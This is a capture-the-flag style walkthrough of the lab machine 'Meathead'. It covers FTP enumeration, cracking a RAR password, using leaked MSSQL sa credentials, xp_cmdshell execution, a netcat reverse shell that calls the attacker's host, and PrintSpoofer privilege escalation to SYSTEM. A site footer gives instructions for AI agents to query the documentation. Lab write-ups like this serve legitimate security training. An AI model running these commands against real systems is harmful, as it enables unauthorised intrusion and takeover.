# Meathead

## Nmap

```
sudo nmap 192.168.67.70 -p- -sV -sS  

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1221/tcp open  ftp           Microsoft ftpd
1435/tcp open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000
3389/tcp open  ms-wbt-server Microsoft Terminal Services
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; 
CPE: cpe:/o:microsoft:windows
```

`FTP` on port 1221 allows anonymous login with passive mode `-p` enabled.

![](/files/-MUd1_jmGQV5-oKbHzWq)

Using the `get` command to downloaded the MSSQL\_BAK.rar file and then using the `unrar` command shows that we need a password to extract the archive.

```
unrar e <archive)
```

![](/files/-MUd2A9E-tJeCe_FOzGW)

We can use the `rar2john` binary that comes with John to get a hash from the password protected RAR file.

![](/files/-MUd2Q1K3eoy129dSmzv)

On my main Windows host I used `hashcat` crack the hash. I have also shown the command used below the `cmd.exe` windows. The cracked password is: `letmeinplease`

![](/files/-MUd35lBazXPPWrcOv8S)

Back on the Kali VM I ran `unrar` again and this time was successful in extracting the archive.

![](/files/-MUd3W3yy4OWVS3AjmVZ)

Reading the contents of mssql\_backup.txt provides the following credentials `sa:EjectFrailtyThorn425`

We are then able to Impacket's `mssqlclient.py` to connect to the target machines SQL.

```
mssqlclient.py -port 1435 sa:EjectFrailtyThorn425@192.168.67.70
```

![](/files/-MUd3rRomD5t0ewfyGCK)

From here we can run `enable_xp_cmdshell` and then confirm command execution with `xp_cmdshell whoami`.

![](/files/-MUd4KpJM6yksmpvo2p7)

From here due to various reasons I was unable to use `certutil.exe` and `Powershell` for file transfer. Instead I set up a `SMB` server on my attacking machine with Impacket's `smbserver.py`.

```
sudo python2 smbserver.py Share /home/kali/
```

![](/files/-MUd7pI1Bh914n09SI0B)

From here we need to ensure nc.exe exists in the same directory in which the `SMB` Server is sharing files from. Set up a `netcat` listener on the attacking machine.

```
nc -lvp 1221
```

Then run the following command on the SQL server running the xp\_cmdshell.

```
xp_cmdshell \\192.168.49.67\Share\nc.exe -e cmd.exe 192.168.49.67 1221
```

We now have a proper reverse shell.

![](/files/-MUd8GoU3mUY8ntER-Ye)

Now connected and checking privileges with the `whoami /all` command we see we have the `SeImpersonatePrivilege` permission.

![](/files/-MiCrJXOI_tMKPi-oW-f)

Checking `systeminfo` for the version of Windows server running we see we are on Windows Server 2019.

![](/files/-MiCrXVgS8sYuDI99e4j)

Given the privileges and version of Windows Server running it is unlikely a JuicyPotato attack would be successful. It is probable however that we can take advantage of these permissions with a `PrintSpoofer.exe` attack.

Binary: <https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0>

Download the binary and place it in the `SMB` share we set up earlier with `smbserver.py`. I then moved over to the FTP directory at `C:\FTP` as this is writeable to the current service account 'mssql$sqlexpress'.

I then copied the binary to the current working directory:

```bash
copy \\<Attacking-IP>\Share\PrintSpoofer.exe
```

Then executed the `PrintSpoofer.exe` with switches to spawn a **SYSTEM** shell in the current shell.

```bash
printspoofer.exe -i -c cmd
```

![](/files/-MiCtHfwGKAMmv-2BS7h)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/meathead.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.